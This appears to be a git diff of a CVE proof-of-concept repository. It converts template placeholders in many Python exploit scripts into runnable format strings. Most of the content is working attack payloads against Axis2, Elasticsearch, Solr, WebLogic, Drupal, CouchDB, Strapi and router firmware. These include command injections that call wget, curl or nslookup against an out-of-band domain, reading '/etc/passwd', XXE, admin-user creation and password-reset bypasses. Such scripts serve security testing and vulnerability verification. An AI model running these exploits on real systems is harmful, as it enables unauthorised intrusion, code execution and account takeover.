diff --git a/2010/CVE-2010-0219/poc/pocsploit/CVE-2010-0219.py b/2010/CVE-2010-0219/poc/pocsploit/CVE-2010-0219.py
index b2964a6c4..9d536ea7d 100644
--- a/2010/CVE-2010-0219/poc/pocsploit/CVE-2010-0219.py
+++ b/2010/CVE-2010-0219/poc/pocsploit/CVE-2010-0219.py
@@ -33,18 +33,20 @@ def fingerprint(url):
 # Proof of Concept
 def poc(url):
     result = {}
+    username = "amdin"
+    password = ""
     try:
         url = format_url(url)
 
         path = """/axis2-admin/login"""
         method = "POST"
-        data = """loginUsername={{username}}&loginPassword={{password}}"""
+        data = """loginUsername={username}&loginPassword={password}""".format(username=username, password=password)
         headers = {'Content-Type': 'application/x-www-form-urlencoded'}
         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         path = """/axis2/axis2-admin/login"""
         method = "POST"
-        data = """userName={{username}}&password={{password}}&submit=+Login+"""
+        data = """userName={username}&password={password}&submit=+Login+""".format(username=username, password=password)
         headers = {'Content-Type': 'application/x-www-form-urlencoded'}
         resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2014/CVE-2014-3120/poc/pocsploit/CVE-2014-3120.py b/2014/CVE-2014-3120/poc/pocsploit/CVE-2014-3120.py
index 9e6c03916..bf3cb6647 100644
--- a/2014/CVE-2014-3120/poc/pocsploit/CVE-2014-3120.py
+++ b/2014/CVE-2014-3120/poc/pocsploit/CVE-2014-3120.py
@@ -1,4 +1,5 @@
 import requests
+import re
 
 
 # Vuln Base Info
@@ -39,24 +40,24 @@ def poc(url):
 
         path = """/_search?pretty"""
         method = "POST"
-        data = """{
-    "size": 1,
-    "query": {
-      "filtered": {
-        "query": {
-          "match_all": {
-          }
+        data = {
+            "size": 1,
+            "query": {
+            "filtered": {
+                "query": {
+                "match_all": {
+                }
+                }
+            }
+            },
+            "script_fields": {
+                "command": {
+                    "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream()).useDelimiter(\"\\\\A\").next();"
+                }
+            }
         }
-      }
-    },
-    "script_fields": {
-        "command": {
-            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream()).useDelimiter(\"\\\\A\").next();"
-        }
-    }
-}"""
         headers = {'Accept': '*/*', 'Accept-Language': 'en', 'Content-Type': 'application/x-www-form-urlencoded'}
-        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         if ("""application/json""" in str(resp0.headers)) and (re.search(r"""root:.*:0:0""",resp0.text)) and (resp0.status_code == 200):
             result["success"] = True
diff --git a/2014/CVE-2014-3206/poc/pocsploit/CVE-2014-3206.py b/2014/CVE-2014-3206/poc/pocsploit/CVE-2014-3206.py
index 588a72787..3756c4004 100644
--- a/2014/CVE-2014-3206/poc/pocsploit/CVE-2014-3206.py
+++ b/2014/CVE-2014-3206/poc/pocsploit/CVE-2014-3206.py
@@ -40,13 +40,13 @@ def poc(url):
 
         oob_domain,flag = gen_oob_domain()
 
-        path = """/backupmgt/localJob.php?session=fail;wget http://oob_domain;"""
+        path = """/backupmgt/localJob.php?session=fail;wget http://{oob_domain};""".format(oob_domain=oob_domain)
         method = "GET"
         data = """"""
         headers = {'Accept': '*/*'}
         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
-        path = """/backupmgt/pre_connect_check.php?auth_name=fail;wget http://oob_domain;"""
+        path = """/backupmgt/pre_connect_check.php?auth_name=fail;wget http://{oob_domain};""".format(oob_domain=oob_domain)
         method = "GET"
         data = """"""
         headers = {'Accept': '*/*'}
diff --git a/2015/CVE-2015-1427/poc/pocsploit/CVE-2015-1427.py b/2015/CVE-2015-1427/poc/pocsploit/CVE-2015-1427.py
index 489fbbcfa..485e106d5 100644
--- a/2015/CVE-2015-1427/poc/pocsploit/CVE-2015-1427.py
+++ b/2015/CVE-2015-1427/poc/pocsploit/CVE-2015-1427.py
@@ -1,4 +1,5 @@
 import requests
+import re
 
 
 # Vuln Base Info
diff --git a/2016/CVE-2016-10033/poc/pocsploit/CVE-2016-10033.py b/2016/CVE-2016-10033/poc/pocsploit/CVE-2016-10033.py
index 282102ba1..92fee0810 100644
--- a/2016/CVE-2016-10033/poc/pocsploit/CVE-2016-10033.py
+++ b/2016/CVE-2016-10033/poc/pocsploit/CVE-2016-10033.py
@@ -32,6 +32,7 @@ def fingerprint(url):
 # Proof of Concept
 def poc(url):
     result = {}
+    username = "admin"
     try:
         url = format_url(url)
 
@@ -43,7 +44,7 @@ def poc(url):
 
         path = """/wp-login.php?action=lostpassword"""
         method = "POST"
-        data = """wp-submit=Get+New+Password&redirect_to=&user_login={{username}}"""
+        data = """wp-submit=Get+New+Password&redirect_to=&user_login={username}""".format(username=username)
         headers = {'Accept': '*/*', 'Content-Type': 'application/x-www-form-urlencoded'}
         resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2016/CVE-2016-10940/poc/pocsploit/CVE-2016-10940.py b/2016/CVE-2016-10940/poc/pocsploit/CVE-2016-10940.py
index c8a05ab62..55dfedea2 100644
--- a/2016/CVE-2016-10940/poc/pocsploit/CVE-2016-10940.py
+++ b/2016/CVE-2016-10940/poc/pocsploit/CVE-2016-10940.py
@@ -20,8 +20,7 @@ def info():
             "cwe-id": "CWE-89"
         },
         "metadata":{
-            "vuln-target": "",
-            
+            "vuln-target": "https://github.com/cckuailong/reapoc/tree/main/2016/CVE-2016-10940/vultarget"
         },
         "tags": ["cve", "cve2016", "sqli", "wp", "wordpress", "wp-plugin", "authenticated"],
     }
diff --git a/2017/CVE-2017-10271/poc/pocsploit/CVE-2017-10271.py b/2017/CVE-2017-10271/poc/pocsploit/CVE-2017-10271.py
index 5b9543e71..1b6740b5e 100644
--- a/2017/CVE-2017-10271/poc/pocsploit/CVE-2017-10271.py
+++ b/2017/CVE-2017-10271/poc/pocsploit/CVE-2017-10271.py
@@ -58,7 +58,7 @@ def poc(url):
                             <string>-c</string>
                         </void>
                         <void index="2">
-                            <string>nslookup oob_domain</string>
+                            <string>nslookup {oob_domain}</string>
                         </void>
                     </array>
                     <void method="start"/></void>
@@ -66,7 +66,7 @@ def poc(url):
         </work:WorkContext>
     </soapenv:Header>
     <soapenv:Body/>
-</soapenv:Envelope>"""
+</soapenv:Envelope>""".format(oob_domain=oob_domain)
         headers = {'Accept': '*/*', 'Accept-Language': 'en', 'Content-Type': 'text/xml'}
         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2017/CVE-2017-11610/poc/pocsploit/CVE-2017-11610.py b/2017/CVE-2017-11610/poc/pocsploit/CVE-2017-11610.py
index 24e0c0c45..ee6eedc3d 100644
--- a/2017/CVE-2017-11610/poc/pocsploit/CVE-2017-11610.py
+++ b/2017/CVE-2017-11610/poc/pocsploit/CVE-2017-11610.py
@@ -46,10 +46,10 @@ def poc(url):
   <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
   <params>
     <param>
-      <string>nslookup oob_domain</string>
+      <string>nslookup {oob_domain}</string>
     </param>
   </params>
-</methodCall>"""
+</methodCall>""".format(oob_domain=oob_domain)
         headers = {'Accept': 'text/xml', 'Content-type': 'text/xml'}
         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2017/CVE-2017-12629/poc/pocsploit/CVE-2017-12629.py b/2017/CVE-2017-12629/poc/pocsploit/CVE-2017-12629.py
index 343def05c..7b1c9d4ab 100644
--- a/2017/CVE-2017-12629/poc/pocsploit/CVE-2017-12629.py
+++ b/2017/CVE-2017-12629/poc/pocsploit/CVE-2017-12629.py
@@ -48,7 +48,7 @@ def poc(url):
         headers = {}
         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
-        path = """/solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2Foob_domain%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser"""
+        path = """/solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{oob_domain}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser""".format(oob_domain=oob_domain)
         method = "GET"
         data = """"""
         headers = {}
diff --git a/2017/CVE-2017-12635/poc/pocsploit/CVE-2017-12635.py b/2017/CVE-2017-12635/poc/pocsploit/CVE-2017-12635.py
index 303a67a99..cc336c3b1 100644
--- a/2017/CVE-2017-12635/poc/pocsploit/CVE-2017-12635.py
+++ b/2017/CVE-2017-12635/poc/pocsploit/CVE-2017-12635.py
@@ -37,15 +37,15 @@ def poc(url):
 
         path = """/_users/org.couchdb.user:poc"""
         method = "PUT"
-        data = """{
-  "type": "user",
-  "name": "poc",
-  "roles": ["_admin"],
-  "roles": [],
-  "password": "123456"
-}"""
+        data = {
+            "type": "user",
+            "name": "poc",
+            "roles": ["_admin"],
+            "roles": [],
+            "password": "123456"
+        }
         headers = {'Accept': 'application/json'}
-        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         if ("""application/json""" in str(resp0.headers) and """""" in str(resp0.headers)) and ("""org.couchdb.user:poc""" in resp0.text and """conflict""" in resp0.text and """Document update conflict""" in resp0.text) and (resp0.status_code == 201 or resp0.status_code == 409):
             result["success"] = True
diff --git a/2017/CVE-2017-14135/poc/pocsploit/CVE-2017-14135.py b/2017/CVE-2017-14135/poc/pocsploit/CVE-2017-14135.py
index c04a4bdee..abd85f032 100644
--- a/2017/CVE-2017-14135/poc/pocsploit/CVE-2017-14135.py
+++ b/2017/CVE-2017-14135/poc/pocsploit/CVE-2017-14135.py
@@ -41,7 +41,7 @@ def poc(url):
 
         oob_domain,flag = gen_oob_domain()
 
-        path = """/webadmin/script?command=|%20nslookup%20oob_domain"""
+        path = """/webadmin/script?command=|%20nslookup%20{oob_domain}""".format(oob_domain=oob_domain)
         method = "GET"
         data = """"""
         headers = {}
diff --git a/2017/CVE-2017-3506/poc/pocsploit/CVE-2017-3506.py b/2017/CVE-2017-3506/poc/pocsploit/CVE-2017-3506.py
index cd38d5644..bd5ae23d8 100644
--- a/2017/CVE-2017-3506/poc/pocsploit/CVE-2017-3506.py
+++ b/2017/CVE-2017-3506/poc/pocsploit/CVE-2017-3506.py
@@ -47,7 +47,7 @@ def poc(url):
     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
       <java version="1.8" class="java.beans.XMLDecoder">
         <void id="url" class="java.net.URL">
-          <string>http://oob_domain</string>
+          <string>http://{oob_domain}</string>
         </void>
         <void idref="url">
           <void id="stream" method ="openStream"/>
@@ -56,7 +56,7 @@ def poc(url):
     </work:WorkContext>
     </soapenv:Header>
   <soapenv:Body/>
-</soapenv:Envelope>"""
+</soapenv:Envelope>""".format(oob_domain=oob_domain)
         headers = {'Content-Type': 'text/xml;charset=UTF-8', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,'}
         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2017/CVE-2017-9506/poc/pocsploit/CVE-2017-9506.py b/2017/CVE-2017-9506/poc/pocsploit/CVE-2017-9506.py
index b8f4e8b3d..e5aef7a34 100644
--- a/2017/CVE-2017-9506/poc/pocsploit/CVE-2017-9506.py
+++ b/2017/CVE-2017-9506/poc/pocsploit/CVE-2017-9506.py
@@ -41,7 +41,7 @@ def poc(url):
 
         oob_domain,flag = gen_oob_domain()
 
-        path = """/plugins/servlet/oauth/users/icon-uri?consumerUri=http://oob_domain"""
+        path = """/plugins/servlet/oauth/users/icon-uri?consumerUri=http://{oob_domain}""".format(oob_domain=oob_domain)
         method = "GET"
         data = """"""
         headers = {}
diff --git a/2018/CVE-2018-10818/poc/pocsploit/CVE-2018-10818.py b/2018/CVE-2018-10818/poc/pocsploit/CVE-2018-10818.py
index a992bf07c..c157ad115 100644
--- a/2018/CVE-2018-10818/poc/pocsploit/CVE-2018-10818.py
+++ b/2018/CVE-2018-10818/poc/pocsploit/CVE-2018-10818.py
@@ -42,13 +42,13 @@ def poc(url):
 
         path = """/system/sharedir.php"""
         method = "POST"
-        data = """&uid=10; wget http://oob_domain"""
+        data = """&uid=10; wget http://{oob_domain}""".format(oob_domain=oob_domain)
         headers = {'Content-Type': 'application/x-www-form-urlencoded'}
         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         path = """/en/php/usb_sync.php"""
         method = "POST"
-        data = """&act=sync&task_number=1;wget http://oob_domain"""
+        data = """&act=sync&task_number=1;wget http://{oob_domain}""".format(oob_domain=oob_domain)
         headers = {'Content-Type': 'application/x-www-form-urlencoded'}
         resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2018/CVE-2018-16167/poc/pocsploit/CVE-2018-16167.py b/2018/CVE-2018-16167/poc/pocsploit/CVE-2018-16167.py
index ecb82b15e..28e5dc48e 100644
--- a/2018/CVE-2018-16167/poc/pocsploit/CVE-2018-16167.py
+++ b/2018/CVE-2018-16167/poc/pocsploit/CVE-2018-16167.py
@@ -42,7 +42,7 @@ def poc(url):
 
         path = """/upload"""
         method = "POST"
-        data = """logtype=XML&timezone=1%3Bwget+http%3A%2F%2Foob_domain%3B"""
+        data = """logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{oob_domain}%3B""".format(oob_domain=oob_domain)
         headers = {'Content-Type': 'application/x-www-form-urlencoded'}
         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2018/CVE-2018-7600/poc/pocsploit/CVE-2018-7600.py b/2018/CVE-2018-7600/poc/pocsploit/CVE-2018-7600.py
index 6cf5174ae..d30e68215 100644
--- a/2018/CVE-2018-7600/poc/pocsploit/CVE-2018-7600.py
+++ b/2018/CVE-2018-7600/poc/pocsploit/CVE-2018-7600.py
@@ -56,7 +56,7 @@ def poc(url):
 user_register_form
 -----------------------------99533888113153068481322586663
 Content-Disposition: form-data; name="_drupal_ajax"'''
-        headers = {'Accept': 'application/json', 'Referer': ' {{Hostname}}/user/register', 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'multipart/form-data; boundary=---------------------------99533888113153068481322586663'}
+        headers = {'Accept': 'application/json', 'Referer': '%s/user/register' % url, 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'multipart/form-data; boundary=---------------------------99533888113153068481322586663'}
         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         if ("""application/json""" in str(resp0.headers)) and (re.search(r"""root:.*:0:0""",resp0.text)) and (resp0.status_code == 200):
diff --git a/2018/CVE-2018-7602/poc/pocsploit/CVE-2018-7602.py b/2018/CVE-2018-7602/poc/pocsploit/CVE-2018-7602.py
index fe812a2e1..335a11c29 100644
--- a/2018/CVE-2018-7602/poc/pocsploit/CVE-2018-7602.py
+++ b/2018/CVE-2018-7602/poc/pocsploit/CVE-2018-7602.py
@@ -1,4 +1,6 @@
 import requests
+import re
+from urllib import parse
 
 
 # Vuln Base Info
@@ -19,8 +21,7 @@ def info():
             "cwe-id": ""
         },
         "metadata":{
-            "vuln-target": "",
-            
+            "vuln-target": "https://github.com/cckuailong/reapoc/tree/main/2018/CVE-2018-7602/vultarget"
         },
         "tags": ["cve", "cve2018", "drupal", "authenticated"],
     }
@@ -33,6 +34,8 @@ def fingerprint(url):
 # Proof of Concept
 def poc(url):
     result = {}
+    username = "drupal"
+    password = "drupal"
     try:
         url = format_url(url)
 
@@ -40,27 +43,42 @@ def poc(url):
 
         path = """/?q=user%2Flogin"""
         method = "POST"
-        data = """form_id=user_login&name={{username}}&pass={{password}}&op=Log+in"""
+        data = """form_id=user_login&name={username}&pass={password}&op=Log+in""".format(username=username, password=password)
         headers = {'Content-Type': 'application/x-www-form-urlencoded'}
         resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        tmp = re.search(r'<meta about="([/a-z0-9]+)" property="foaf', resp0.text)
+        if tmp:
+            userid = parse.quote(tmp.group())
+        else:
+            return result
 
-        path = """/?q={{url_encode("{{userid}}")}}%2Fcancel"""
+        path = """/?q={userid}%2Fcancel""".format(userid=userid)
         method = "GET"
         data = """"""
         headers = {}
         resp1 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        tmp = re.search(r'<input type="hidden" name="form_token" value="(.*)" />', resp1.text)
+        if tmp:
+            form_token = tmp.group()
+        else:
+            return result
 
-        path = """/?q={{url_encode("{{userid}}")}}%2Fcancel&destination={{url_encode("{{userid}}")}}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev"""
+        path = """/?q={userid}%2Fcancel&destination={userid}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev""".format(userid=userid)
         method = "POST"
-        data = """form_id=user_cancel_confirm_form&form_token={{form_token}}&_triggering_element_name=form_id&op=Cancel+account"""
+        data = """form_id=user_cancel_confirm_form&form_token={form_token}&_triggering_element_name=form_id&op=Cancel+account""".format(form_token=form_token)
         headers = {'Content-Type': 'application/x-www-form-urlencoded'}
         resp2 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        tmp = re.search(r'<input type="hidden" name="form_build_id" value="(.*)" />', resp1.text)
+        if tmp:
+            form_build_id = tmp.group()
+        else:
+            return result
 
-        path = """/?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}}"""
+        path = """/?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{form_build_id}""".format(form_build_id=form_build_id)
         method = "POST"
-        data = """form_build_id={{form_build_id}}"""
+        data = """form_build_id={form_build_id}""".format(form_build_id=form_build_id)
         headers = {'Content-Type': 'application/x-www-form-urlencoded'}
-        resp3 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp3 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=True)
 
         if ("""CVE-2018-7602-POC""" in resp3.text):
             result["success"] = True
diff --git a/2019/CVE-2019-0193/poc/pocsploit/CVE-2019-0193.py b/2019/CVE-2019-0193/poc/pocsploit/CVE-2019-0193.py
index 734b7c33e..8e3e05c7d 100644
--- a/2019/CVE-2019-0193/poc/pocsploit/CVE-2019-0193.py
+++ b/2019/CVE-2019-0193/poc/pocsploit/CVE-2019-0193.py
@@ -49,7 +49,7 @@ def poc(url):
 
         path = """/solr/{{core}}/dataimport?indent=on&wt=json"""
         method = "POST"
-        data = """command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20http://oob_domain%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport"""
+        data = """command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20http://{oob_domain}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport""".format(oob_domain=oob_domain)
         headers = {'Content-type': 'application/x-www-form-urlencoded', 'X-Requested-With': 'XMLHttpRequest'}
         resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2019/CVE-2019-10758/poc/pocsploit/CVE-2019-10758.py b/2019/CVE-2019-10758/poc/pocsploit/CVE-2019-10758.py
index 177cc860b..14f0ddadd 100644
--- a/2019/CVE-2019-10758/poc/pocsploit/CVE-2019-10758.py
+++ b/2019/CVE-2019-10758/poc/pocsploit/CVE-2019-10758.py
@@ -42,7 +42,7 @@ def poc(url):
 
         path = """/checkValid"""
         method = "POST"
-        data = """document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl http://oob_domain")"""
+        data = """document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl http://{oob_domain}")""".format(oob_domain=oob_domain)
         headers = {'Authorization': 'Basic YWRtaW46cGFzcw==', 'Content-Type': 'application/x-www-form-urlencoded'}
         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2019/CVE-2019-17558/poc/pocsploit/CVE-2019-17558.py b/2019/CVE-2019-17558/poc/pocsploit/CVE-2019-17558.py
index 1314053bb..040a191b1 100644
--- a/2019/CVE-2019-17558/poc/pocsploit/CVE-2019-17558.py
+++ b/2019/CVE-2019-17558/poc/pocsploit/CVE-2019-17558.py
@@ -41,30 +41,28 @@ def poc(url):
 
         path = """/solr/admin/cores?wt=json"""
         method = "GET"
-        data = """"""
         headers = {}
-        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp0 = requests.request(method=method,url=url+path,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         path = """/solr/{{core}}/config"""
         method = "POST"
-        data = """{
-    "update-queryresponsewriter": {
-      "startup": "lazy",
-      "name": "velocity",
-      "class": "solr.VelocityResponseWriter",
-      "template.base.dir": "",
-      "solr.resource.loader.enabled": "true",
-      "params.resource.loader.enabled": "true"
-    }
-}"""
+        data = {
+            "update-queryresponsewriter": {
+            "startup": "lazy",
+            "name": "velocity",
+            "class": "solr.VelocityResponseWriter",
+            "template.base.dir": "",
+            "solr.resource.loader.enabled": "true",
+            "params.resource.loader.enabled": "true"
+            }
+        }
         headers = {'Content-Type': 'application/json'}
-        resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp1 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
-        path = """/solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20http://oob_domain%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"""
+        path = """/solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20http://{oob_domain}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end""".format(oob_domain=oob_domain)
         method = "GET"
-        data = """"""
         headers = {'Connection': 'close'}
-        resp2 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp2 = requests.request(method=method,url=url+path,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         if verify_request(type="dns", flag=flag):
             result["success"] = True
diff --git a/2019/CVE-2019-18818/poc/pocsploit/CVE-2019-18818.py b/2019/CVE-2019-18818/poc/pocsploit/CVE-2019-18818.py
index 1a62ba197..00bf2b962 100644
--- a/2019/CVE-2019-18818/poc/pocsploit/CVE-2019-18818.py
+++ b/2019/CVE-2019-18818/poc/pocsploit/CVE-2019-18818.py
@@ -39,9 +39,9 @@ def poc(url):
 
         path = """/admin/auth/reset-password"""
         method = "POST"
-        data = """{"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"}"""
+        data = {"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"}
         headers = {'Content-Type': 'application/json'}
-        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         if (resp0.status_code == 200) and ("""application/json""" in str(resp0.headers)) and ("""username":""" in resp0.text and """email":""" in resp0.text and """jwt":""" in resp0.text):
             result["success"] = True
diff --git a/2019/CVE-2019-19824/poc/pocsploit/CVE-2019-19824.py b/2019/CVE-2019-19824/poc/pocsploit/CVE-2019-19824.py
index e36a6d999..e4e31f4c4 100644
--- a/2019/CVE-2019-19824/poc/pocsploit/CVE-2019-19824.py
+++ b/2019/CVE-2019-19824/poc/pocsploit/CVE-2019-19824.py
@@ -43,7 +43,7 @@ def poc(url):
 
         path = """/boafrm/formSysCmd"""
         method = "POST"
-        data = """submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://oob_domain"""
+        data = """submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://{oob_domain}""".format(oob_domain=oob_domain)
         headers = {'Authorization': 'Basic YWRtaW46cGFzc3dvcmQ=', 'Content-Type': 'application/x-www-form-urlencoded'}
         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2019/CVE-2019-2616/poc/pocsploit/CVE-2019-2616.py b/2019/CVE-2019-2616/poc/pocsploit/CVE-2019-2616.py
index 7455ec045..6eedf37d9 100644
--- a/2019/CVE-2019-2616/poc/pocsploit/CVE-2019-2616.py
+++ b/2019/CVE-2019-2616/poc/pocsploit/CVE-2019-2616.py
@@ -42,7 +42,7 @@ def poc(url):
 
         path = """/xmlpserver/ReportTemplateService.xls"""
         method = "POST"
-        data = """<!DOCTYPE soap:envelope PUBLIC "-//B/A/EN" "http://oob_domain">"""
+        data = """<!DOCTYPE soap:envelope PUBLIC "-//B/A/EN" "http://{oob_domain}">""".format(oob_domain=oob_domain)
         headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Content-Type': 'text/xml; charset=UTF-8'}
         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2019/CVE-2019-2767/poc/pocsploit/CVE-2019-2767.py b/2019/CVE-2019-2767/poc/pocsploit/CVE-2019-2767.py
index 92c71c9df..e0bb79eb2 100644
--- a/2019/CVE-2019-2767/poc/pocsploit/CVE-2019-2767.py
+++ b/2019/CVE-2019-2767/poc/pocsploit/CVE-2019-2767.py
@@ -40,7 +40,7 @@ def poc(url):
 
         oob_domain,flag = gen_oob_domain()
 
-        path = """/xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//oob_domain/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123"""
+        path = """/xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//{oob_domain}/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123""".format(oob_domain=oob_domain)
         method = "GET"
         data = """"""
         headers = {}
diff --git a/2019/CVE-2019-7238/poc/pocsploit/CVE-2019-7238.py b/2019/CVE-2019-7238/poc/pocsploit/CVE-2019-7238.py
